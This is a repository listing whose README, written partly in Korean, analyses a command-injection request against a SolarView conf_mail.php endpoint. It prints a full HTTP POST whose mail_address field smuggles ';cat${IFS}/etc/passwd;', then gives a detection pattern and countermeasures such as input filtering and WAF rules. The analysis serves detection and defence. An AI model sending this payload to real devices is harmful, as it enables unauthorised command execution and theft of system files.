https://github.com/mr-won/solarview_os_command_injection
SolarView_OS_Command_Injection
https://github.com/mr-won/solarview_os_command_injection
Last synced: over 1 year ago
JSON representation
SolarView_OS_Command_Injection
- Host: GitHub
- URL: https://github.com/mr-won/solarview_os_command_injection
- Owner: mr-won
- Created: 2025-03-19T05:02:45.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-03-19T05:07:36.000Z (over 1 year ago)
- Last Synced: 2025-03-19T06:22:15.065Z (over 1 year ago)
- Size: 1.95 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
post /conf_mail.php http/1.1 host: 10.1.1.1 user-agent: mozilla/5.0 (x11; cros x86_64 14541.0.0) applewebkit/537.36 (khtml, like gecko) chrome/117.0.0.0 safari/537.36 connection: close content-length: 75 content-type: application/x-www-form-urlencoded accept-encoding: gzip mail_address=;cat${ifs}/etc/passwd;&button=
- 공격 이름: `Command Injection`
- 판단 근거: 페이로드에 `cat${ifs}/etc/passwd` 명령어가 포함되어 있음
- 탐지 패턴: `;cat${ifs}/etc/passwd;`
- 설명: Command Injection은 웹 애플리케이션에 악의적인 시스템 명령어를 주입하여 서버에서 실행시키는 공격 기법입니다.
- 대응 방법: 입력값 검증 및 필터링 강화, 웹 방화벽(WAF)에서 명령어 주입 패턴 차단 규칙 추가